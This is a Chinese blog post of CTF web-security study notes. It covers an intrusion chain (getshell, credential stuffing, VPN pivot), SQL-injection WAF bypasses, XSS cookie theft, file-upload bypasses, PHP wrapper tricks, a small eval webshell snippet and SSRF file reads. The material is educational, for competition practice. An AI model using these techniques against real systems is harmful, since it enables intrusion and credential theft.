<!DOCTYPE html><html lang="zh-Hans"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="My Note"><meta name="keywords" content="web,sql,note"><meta name="author" content="MOZac Connecter"><meta name="copyright" content="MOZac Connecter"><title>My Note | MOZac的小屋</title><link rel="shortcut icon" href="/melody-favicon.ico"><link rel="stylesheet" href="/css/index.css?version=1.9.0"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.9.0"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><script>(adsbygoogle = window.adsbygoogle || []).push({
  google_ad_client: 'ca-pub-7313518215964899',
  enable_page_level_ads: 'true'
});
</script><meta name="google-site-verification" content="UA-186375523"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  hexoVersion: '5.3.0'
} </script><meta name="generator" content="Hexo 5.3.0"><link rel="alternate" href="/atom.xml" title="MOZac的小屋" type="application/atom+xml">
</head><body><canvas class="fireworks"></canvas><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="true"><div class="toggle-sidebar-info text-center"><span data-toggle="切换文章详情">切换站点概览</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E7%AC%94%E8%AE%B0"><span class="toc-number">1.</span> <span class="toc-text">笔记</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#CTF%E5%AD%A6%E4%B9%A0"><span class="toc-number">2.</span> <span class="toc-text">CTF学习</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E8%AE%B0%E5%A4%A7%E4%BD%AC%E7%9A%84%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E8%AE%B0%E5%BD%95"><span class="toc-number">3.</span> <span class="toc-text">记大佬的渗透测试记录</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web%E7%8B%97%E5%A6%82%E4%BD%95%E5%9C%A8CTF-web%E4%B8%AD%E7%9A%84%E5%A5%97%E8%B7%AF%E4%B8%AD%E5%AE%9E%E7%8E%B0%E5%8F%8D%E5%A5%97%E8%B7%AF"><span class="toc-number">4.</span> <span class="toc-text">web狗如何在CTF-web中的套路中实现反套路</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%A2%98%E7%9B%AE%E7%B1%BB%E5%9E%8B"><span class="toc-number">4.1.</span> <span class="toc-text">题目类型</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#SQL%E6%B3%A8%E5%85%A5%E5%B7%A5%E5%85%B7"><span class="toc-number">4.1.0.1.</span> <span class="toc-text">SQL注入工具</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#SQL%E8%A7%A3%E9%A2%98%E6%80%9D%E8%B7%AF"><span class="toc-number">4.1.0.2.</span> <span class="toc-text">SQL解题思路</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#SQL%E6%B3%A8%E5%85%A5%E6%8A%80%E5%B7%A7"><span class="toc-number">4.1.0.3.</span> <span class="toc-text">SQL注入技巧</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#XSS"><span class="toc-number">4.1.1.</span> <span class="toc-text">XSS</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#XSS%E6%B3%A8%E5%85%A5%E5%B7%A5%E5%85%B7"><span class="toc-number">4.1.1.1.</span> <span class="toc-text">XSS注入工具</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#XSS%E8%A7%A3%E9%A2%98%E6%80%9D%E8%B7%AF"><span class="toc-number">4.1.1.2.</span> <span class="toc-text">XSS解题思路</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0"><span class="toc-number">4.1.2.</span> <span class="toc-text">文件上传</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E5%B7%A5%E5%85%B7"><span class="toc-number">4.1.2.1.</span> <span class="toc-text">文件上传工具</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E8%A7%A3%E9%A2%98%E6%80%9D%E8%B7%AF"><span class="toc-number">4.1.2.2.</span> <span class="toc-text">文件上传解题思路</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#php%E7%89%B9%E6%80%A7"><span class="toc-number">4.1.2.3.</span> <span class="toc-text">php特性</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#PHP%E7%89%B9%E6%80%A7-%E5%B7%A5%E5%85%B7"><span class="toc-number">4.1.2.4.</span> <span class="toc-text">PHP特性-工具</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#php%E7%89%B9%E6%80%A7-%E8%A7%A3%E9%A2%98%E6%80%9D%E8%B7%AF"><span class="toc-number">4.1.2.5.</span> <span class="toc-text">php特性-解题思路</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#php%E7%89%B9%E6%80%A7-%E4%BC%AA%E5%8D%8F%E8%AE%AE"><span class="toc-number">4.1.2.6.</span> <span class="toc-text">php特性-伪协议</span></a></li></ol></li></ol></li></ol></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="https://s3.ax1x.com/2020/12/21/r0TN5t.png"></div><div class="author-info__name text-center">MOZac Connecter</div><div class="author-info__description text-center">安全人Mozac的平凡日常</div><div class="follow-button"><a target="_blank" rel="noopener" href="https://space.bilibili.com/13299663">关注我</a></div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">文章</span><span class="pull-right">13</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">标签</span><span class="pull-right">22</span></a><a class="author-info-articles__categories article-meta" href="/categories"><span class="pull-left">分类</span><span class="pull-right">4</span></a></div><hr><div class="author-info-links"><div class="author-info-links__title text-center">朋友们</div><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://www.vincehut.top/">Vince迷航者</a></div></div></div><div id="content-outer"><div class="no-bg" id="top-container"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">MOZac的小屋</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus">   <a class="site-page" href="/">主页</a><a class="site-page" href="/archives">文章</a><a class="site-page" href="/tags">标签</a><a class="site-page" href="/categories">分类</a></span><span class="pull-right"></span></div><div id="post-info"><div id="post-title">My Note</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2020-08-07</time><span class="post-meta__separator">|</span><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/%E7%AC%94%E8%AE%B0/">笔记</a></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><h1 id="笔记"><a href="#笔记" class="headerlink" title="笔记"></a>笔记</h1><p>1.信息收集 </p>
<p>2.登陆后台—–&gt;getshell </p>
<p>3.Getshell失败—–&gt;转换思路——&gt;挖掘其它漏洞(sql注入等)——&gt;列库收集用户信息 </p>
<p>4.拿到用户密码——&gt;撞邮箱——–&gt;邮箱拿到关键信息———–&gt;拿到vpn </p>
<p>5.通过vpn去访问文件服务器——-&gt;写脚本getshell </p>
<h1 id="CTF学习"><a href="#CTF学习" class="headerlink" title="CTF学习"></a>CTF学习</h1><p>1.xss打后台—–&gt;403———-&gt;ajax抓取页面回转出来———&gt;sql注入—&gt;getting </p>
<p>2.Bypass Waf来注入 (%00,||,seselectlect 等等 )，国内web常见题型 </p>
<p>3.代码审计 花式杂耍php的各种特性（反序列化、弱类型） </p>
<p>4.文件上传 花式Bypass上传（.php111  .inc  .phpt） </p>
<p>5.各种当前热点漏洞 </p>
<p>扫描路径—-&gt; phpinfo() ——&gt;  php7 ——-php7 opcache —-&gt;查看文档 —–&gt;  花式绕坑  ——&gt;  Getshell </p>
<p>6.社会工程学（常用密码） </p>
<p>7.各种Web漏洞夹杂 </p>
<p>8.具有内网环境真实渗透场景 </p>
<h1 id="记大佬的渗透测试记录"><a href="#记大佬的渗透测试记录" class="headerlink" title="记大佬的渗透测试记录"></a>记大佬的渗透测试记录</h1><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">1.对目标进行信息采集 </span><br><span class="line">2.主站拿不下来，决定拿二级域名 </span><br><span class="line">3.排查二级域名 </span><br><span class="line">4.根据二级域名的名字选择upload edit等等具有操作功能的站点入手 </span><br><span class="line">5.存在svn漏洞的话，尝试通过wc、db的形式，利用sqlite将源码还原出来 </span><br><span class="line">6.审计源代码，快速定位代码，全文搜索exec、upload，include等等这些危险操作 </span><br><span class="line">7.到一个exec命令执行，发现管理员权限 </span><br><span class="line">8.回溯代码，定位管理员登录功能，审计出cookie算法可以破解 </span><br><span class="line">9.伪造cookie反弹shell，上去后发现很多站点在上面，权限不够 </span><br><span class="line">10.查看版本 </span><br><span class="line">11.利用之前ctf中的一个一句话提权成功，然后大杀四方。 </span><br><span class="line"></span><br><span class="line"></span><br><span class="line">1.常规的进行信息搜集踩点工作 </span><br><span class="line">2.猜解用户名密码（组合了网站的域名和电话号） </span><br><span class="line">3.登录后台，测试文件上传功能，上传文件中只要含有&lt;?php&gt;就进行上传 </span><br><span class="line">4.脑洞一开，&lt;script language &#x3D;  &quot;php&#39;&gt; 成功getshell </span><br></pre></td></tr></table></figure>
<h1 id="web狗如何在CTF-web中的套路中实现反套路"><a href="#web狗如何在CTF-web中的套路中实现反套路" class="headerlink" title="web狗如何在CTF-web中的套路中实现反套路"></a>web狗如何在CTF-web中的套路中实现反套路</h1><blockquote>
<p>讲师：三十、伪赛棍 </p>
</blockquote>
<h2 id="题目类型"><a href="#题目类型" class="headerlink" title="题目类型"></a>题目类型</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">1.SQL注入 </span><br><span class="line">2.XSS </span><br><span class="line">3.代码审计 </span><br><span class="line">4.文件上传 </span><br><span class="line">5.php特性 </span><br><span class="line">6.后台登陆类 </span><br><span class="line">7.加密解密 </span><br><span class="line">8.其他脑洞、猜谜、和其它结合 </span><br></pre></td></tr></table></figure>
<p>SQL注入 </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">1.简单注入 </span><br><span class="line">	‘、and 1&#x3D;1、or 1&#x3D;1、xor 1&#x3D;1 </span><br><span class="line">2.宽字节注入 </span><br><span class="line">	GBK字符集编码，过滤绕过 </span><br><span class="line">3.花式绕mysql </span><br><span class="line">	intervalue(),数字注入 </span><br><span class="line">4.绕关键词检测拦截 </span><br><span class="line">	重复性(selselectect) </span><br><span class="line">5.MongoDB注入 </span><br><span class="line">	nosql注入（nosqlmap） </span><br><span class="line">6.http头部注入 </span><br><span class="line">	x-for-ward注入、IP地址注入、refer注入 </span><br><span class="line">7.二次注入 </span><br><span class="line">	插入注入，另一个页面注入 </span><br></pre></td></tr></table></figure>
<h4 id="SQL注入工具"><a href="#SQL注入工具" class="headerlink" title="SQL注入工具"></a>SQL注入工具</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">1.burpsuit </span><br><span class="line">2.Hackbar </span><br><span class="line">3.Sqlmap </span><br><span class="line">4.Nosqlmap </span><br></pre></td></tr></table></figure>
<h4 id="SQL解题思路"><a href="#SQL解题思路" class="headerlink" title="SQL解题思路"></a>SQL解题思路</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">简单：用sqlmap跑 </span><br><span class="line">判断注入点，是否是Http头注入？是否在图片出注入？等 </span><br><span class="line">判断注入类型 </span><br><span class="line">利用报错信息注入 </span><br><span class="line">尝试各种绕过过滤方法 </span><br><span class="line">查找是否是通过的某模块存在的注入漏洞 </span><br><span class="line">延时注入（对待盲注） </span><br></pre></td></tr></table></figure>
<h4 id="SQL注入技巧"><a href="#SQL注入技巧" class="headerlink" title="SQL注入技巧"></a>SQL注入技巧</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line">sql-mod&#x3D;&quot;STRICT_TRANS_TABLES&quot;(默认未开启) </span><br><span class="line">	插入数据截断，插入“admin                                                     X”绕过或越权访问 </span><br><span class="line">注意二次注入 </span><br><span class="line">	isg2015 web350 username从session中直接带入查询，利用数据库字段长度 </span><br><span class="line">	截断，\被gpc后为\\,但是被截断了只剩下一个\，引发注入。 </span><br><span class="line">如果猜解不出数据库的字段，搜索后台，查看源代码，源代码登录时的表单中的字 </span><br><span class="line">段一班和1数据库的字段名相同 </span><br><span class="line">绕过安全狗 </span><br><span class="line">	se%lect </span><br><span class="line"> 针对asp+access，首先来挖掘一下数据库的特性。 </span><br><span class="line">	1.代替空格：%09、%0A、%0C、#0D </span><br><span class="line">	2.可以截断后面语句注释符：%00,%16,%22,%27 </span><br><span class="line">	3.当%09、%0A、%0A、%0C、%0D超过一定长度后，安全狗防御失效。 </span><br><span class="line">	4.UserAgent:BaiduSpider </span><br><span class="line">magic_quotes_gpc&#x3D;On的情况下，提交的参数中如果带有引号’，就会被自动转 </span><br><span class="line">义为\&#39;,使很多注入攻击无效 </span><br><span class="line">1 </span><br><span class="line">2 </span><br><span class="line">3 </span><br><span class="line">4 </span><br><span class="line">5 </span><br><span class="line">6 </span><br><span class="line">7 </span><br><span class="line">8 </span><br><span class="line">9 </span><br><span class="line">10 </span><br><span class="line">11 </span><br><span class="line">12 </span><br><span class="line">13 </span><br><span class="line">14 </span><br><span class="line">15 </span><br><span class="line">16 </span><br><span class="line">17 </span><br><span class="line">18 </span><br><span class="line">19 </span><br><span class="line">20 </span><br></pre></td></tr></table></figure>
<h3 id="XSS"><a href="#XSS" class="headerlink" title="XSS"></a>XSS</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">简单：存储型XSS盲打管理员后台 </span><br><span class="line">各种浏览器auditor绕过 </span><br><span class="line">富文本过滤黑白名单绕过 </span><br><span class="line">CSP绕过 </span><br><span class="line">Flash xss </span><br><span class="line">AngularJS客户端模板XSS </span><br><span class="line">..... </span><br></pre></td></tr></table></figure>
<h4 id="XSS注入工具"><a href="#XSS注入工具" class="headerlink" title="XSS注入工具"></a>XSS注入工具</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">Burpsuit </span><br><span class="line">HackBar </span><br><span class="line">Xss平台 </span><br><span class="line">swf decomplier </span><br><span class="line">flasm </span><br><span class="line">doswf(swf加密) </span><br><span class="line">Crypt Flow (swf加密) </span><br><span class="line">...... </span><br></pre></td></tr></table></figure>
<h4 id="XSS解题思路"><a href="#XSS解题思路" class="headerlink" title="XSS解题思路"></a>XSS解题思路</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">简单XSS，直接利用XSS平台盲打管理员cookie </span><br><span class="line">过滤标签，尝试各种绕过方法 </span><br><span class="line">存在安全策略csp等，尝试相应的绕过方法 </span><br><span class="line">逆向.swf文件，审计源码，构造XSS payload </span><br><span class="line">...... </span><br></pre></td></tr></table></figure>
<h3 id="文件上传"><a href="#文件上传" class="headerlink" title="文件上传"></a>文件上传</h3><p>类型： </p>
<ul>
<li>00截断上传 </li>
<li>multipart/form-data大写绕过 </li>
<li>花式文件后缀（.php345  .inc  .phtml .phps） </li>
<li>各种文件内容检测 </li>
<li>各种解析漏洞 ngix-fastcgi </li>
<li>花式打狗棒法 </li>
<li>在线编辑器漏洞等 fckeditor </li>
<li>fckeditor 2.0&lt;2.2  允许上传asa,cer,php2,php4,inc.pwml,pht后缀的文件上传后它保存的文件直接使用$sFilePath =  $sServerDir ,$Filename,而没有使用$sExtension为后缀，直接导致在win下上传文件后面加个 . 来突破 </li>
<li>文件包含 <h4 id="文件上传工具"><a href="#文件上传工具" class="headerlink" title="文件上传工具"></a>文件上传工具</h4></li>
</ul>
<ul>
<li>hackbar </li>
<li>Burpsuit </li>
<li>Webshell </li>
<li>中国菜刀 </li>
<li>AantSword <h4 id="文件上传解题思路"><a href="#文件上传解题思路" class="headerlink" title="文件上传解题思路"></a>文件上传解题思路</h4></li>
</ul>
<ul>
<li>简单文件上传，查看响应 </li>
<li>是否只是前端过滤后缀名，文件格式，抓包绕过 </li>
<li>是否存在截断上传漏洞 </li>
<li>是否对文件头检测（图片马等） </li>
<li>是否对内容进行检测，尝试绕过方法 </li>
<li>是否上传马被查杀，免杀 </li>
<li>是否存在各种解析漏洞 </li>
<li>http头以两个CRLF（相当于\r\n\r\n）作为结尾，\r\n没有被过滤时，可以利用\r\n作为url参数截断http头，后面跟上注入代码 </li>
<li>… <strong>练习题：HTCTF-2016 题目14</strong> <h4 id="php特性"><a href="#php特性" class="headerlink" title="php特性"></a>php特性</h4></li>
</ul>
<ul>
<li>弱类型 </li>
<li>intval </li>
<li>strpos和== </li>
<li>反序列化+destruct </li>
<li>\0截断 </li>
<li>iconv截断 （%00截断） </li>
<li>parse_str函数 </li>
<li>伪协议(io流操作) <h4 id="PHP特性-工具"><a href="#PHP特性-工具" class="headerlink" title="PHP特性-工具"></a>PHP特性-工具</h4></li>
</ul>
<ul>
<li>hackbar </li>
<li>burpsuit </li>
<li><a target="_blank" rel="noopener" href="http://www.shucunwang.com/RunCode/php">在线调试环境</a><h4 id="php特性-解题思路"><a href="#php特性-解题思路" class="headerlink" title="php特性-解题思路"></a>php特性-解题思路</h4></li>
</ul>
<ul>
<li>判断是否存在php种截断特性 </li>
<li>查看源码，判断是否存在php弱类型问题 </li>
<li>查看源码，注意一些特殊函数 eval()，system()，intval() </li>
<li>构造变量，获取flag </li>
<li>是否存在Http （请求参数污染,加两个参数的不同情况。） </li>
<li>魔法哈希(magic hash) mad5(‘240610708’) = md5(‘QBKCDZO’) = 0e830400451993494058024219903391 </li>
<li>… <h4 id="php特性-伪协议"><a href="#php特性-伪协议" class="headerlink" title="php特性-伪协议"></a>php特性-伪协议</h4></li>
</ul>
<ul>
<li>php://filter –对本地磁盘文件进行读写 <a target="_blank" rel="noopener" href="http://localhost/test/index.php?file=php://filter/read=convert.base64-encode/resource=index.php">http://localhost/test/index.php?file=php://filter/read=convert.base64-encode/resource=index.php</a></li>
</ul>
<p>php://input 伪协议    php://input   需要服务器支持，同时要求 “allow_url_include ”属性设置为 on </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&#96;&#96;&#96; </span><br><span class="line">&lt;?php </span><br><span class="line">	@eval(file_get_contents(&#39;php:&#x2F;&#x2F;input&#39;)) </span><br><span class="line">?&gt; </span><br><span class="line">post&lt;?php system(&#39;ifconfig&#39;);?&gt; </span><br></pre></td></tr></table></figure>
<pre><code>
* 
* php://memory 总是吧数据存储在内存中 
* php://temp会在内存量达到预定义的限制后（默认2M）存入临时文件 
* … 

1.DATA伪协议，分号和逗号有争议 


* data:文本数据 
* data:text/plain，文本数据 
* data:text/html，HTML代码 
* data:text/css；base64，css代码 
* data:text/javascript;base64,javascript 代码 
* 编码的icon图片数据 
* 编码的gif图片 
* 编码的png图片 
* 编码的jpeg图片 

glob://查找匹配文件路径模式 

### 后台登录类 


* 万能密码绕过 
* 变形万能密码绕过 
* 社工的方式得到后台密码 
* 爆破方式得到后台密码 
* 各种cms后台登陆绕过 
#### 后台登录类-工具 


* burpsuit 
* hackbar 
* sqlmap 
* 社工库 
* … 
#### 后台登录类解题思路 


* 根据提示，判断是否是普通的登录绕过，或是利用社工的方式 
* 普通登录绕过尝试各种万能密码绕过，或通过sql注入漏洞得到账号密码，或xss盲打 
* 若果是cms系统登陆，查找是否有相应版本的后台绕过漏洞 
* 社工方式（谷歌、百度、社工库） 
* 爆破获取 
* … 
### 加密解密类-考察知识点 


* 简单编码（多次basecode编码） 
* 密码题（hash长度扩展、异或、移位加密、各种变形） 
* js加解密 
* 根据加密源码写解密源码 
* … 
#### 加解密类-工具 


* 各种编码转换工具 
* Burpsuit 
* 浏览器控制台 
* … 
#### 加解密类-解题思路 


* 判断是编码还是加密 
* 如果是编码，判断编码类型，尝试解码或者多次编码 
* 如果是加密，判断是现有的加密算法，还是字写得加密算法 
* 是否是对称加密，是否存在密钥泄露等，获取密钥解密 
* 根据加密算法，推断出解密算法 
* … 
### 其它类型 



社工、花式查社工库、微博、QQ签名、whois、谷歌 



例题：ISG CTF 2014 Web4 火眼金睛 


* google查找googole天涯社会工库，即可查找。 [http://www.findmima.com](http://www.findmima.com)



SSRF，包括花式探测端口，302跳转、花式协议利用、gophar直接取shell等等 



例题：XDCTF2015 Web1 300 


* 本题为SSRF，进去是一个框框。利用SSRF漏洞，直接尝试 [file://index.php,然后就吧index.php的源码读到](file://index.php,然后就吧index.php的源码读到)，之后进行代码审计。 



协议，花式IP伪造 X-Forwarded-For/X-Client-IP/X-Real/CDN-Src-IP、花式藏FLAG、花式分析数据包 



例题：HCTF2014jianshu (400pt) 解题思路： 




    * Html编码payload用burp改包提交获得一个ip和审核链接。 xss获取远程IP地址 ：218.75.123.186 后台访问页面： [http://121.41.37.11:2504/get.php?user=V1ew](http://121.41.37.11:2504/get.php?user=V1ew)X-Forwarded-For 伪造登录上去没有flag。 看到提示转换思路，后面为sql注入，得到管理员密码 [http://121.41.37.11:25045/get.php?user=A1rB4s1C](http://121.41.37.11:25045/get.php?user=A1rB4s1C)加上 X-Forwarded-For ：218.75.123.186伪造ip登陆上去。 
* * XXE 各种XML存在地方(rss/word/流媒体)、各种XXE利用方法（文件读取） 例题：AliCTF-Quals-2014 Web-300 

推荐 **经典例题** ： [http://lab10.wargame.whitehat.vn/web007](http://lab10.wargame.whitehat.vn/web007) 
</code></pre>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">MOZac Connecter</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="https://mozac-void.yixiangtang.icu/2020/08/07/My-Note/">https://mozac-void.yixiangtang.icu/2020/08/07/My-Note/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://mozac-void.yixiangtang.icu">MOZac的小屋</a>！</span></div></div><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/web/">web</a><a class="post-meta__tags" href="/tags/sql/">sql</a><a class="post-meta__tags" href="/tags/note/">note</a></div><div class="social-share pull-right" data-disabled="facebook"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js@1.0.16/dist/css/share.min.css"><script src="https://cdn.jsdelivr.net/npm/social-share.js@1.0.16/dist/js/social-share.min.js"></script><nav id="pagination"><div class="prev-post pull-left"><a href="/2020/08/07/MOZac-BUUCTF-WP/"><i class="fa fa-chevron-left">  </i><span>BUUCTF-WP</span></a></div></nav><div class="post-adv"><iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width=728 height=110 src="//music.163.com/outchain/player?type=0&id=2110349418&auto=1&height=90"></iframe></div><div id="lv-container" data-id="city" data-uid="MTAyMC81MjI0My8yODcyMg=="><script>(function(d, s) {
    var j, e = d.getElementsByTagName(s)[0];
    if (typeof LivereTower === 'function') { return; }
    j = d.createElement(s);
    j.src = 'https://cdn-city.livere.com/js/embed.dist.js';
    j.async = true;
    e.parentNode.insertBefore(j, e);
})(document, 'script');</script></div></div></div><footer><div class="layout" id="footer"><div class="copyright">&copy;2019 - 2021 By MOZac Connecter</div><div class="framework-info"><span>驱动 - </span><a target="_blank" rel="noopener" href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>主题 - </span><a target="_blank" rel="noopener" href="https://github.com/Molunerfinn/hexo-theme-melody"><span>Melody</span></a></div><div class="icp"><a><span>鲁ICP备2020049110号</span></a></div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.9.0"></script><script src="/js/fancybox.js?version=1.9.0"></script><script src="/js/sidebar.js?version=1.9.0"></script><script src="/js/copy.js?version=1.9.0"></script><script src="/js/fireworks.js?version=1.9.0"></script><script src="/js/transition.js?version=1.9.0"></script><script src="/js/scroll.js?version=1.9.0"></script><script src="/js/head.js?version=1.9.0"></script><script id="ribbon" src="/js/third-party/canvas-ribbon.js" size="150" alpha="0.6" zIndex="-1" data-click="false"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script></body></html>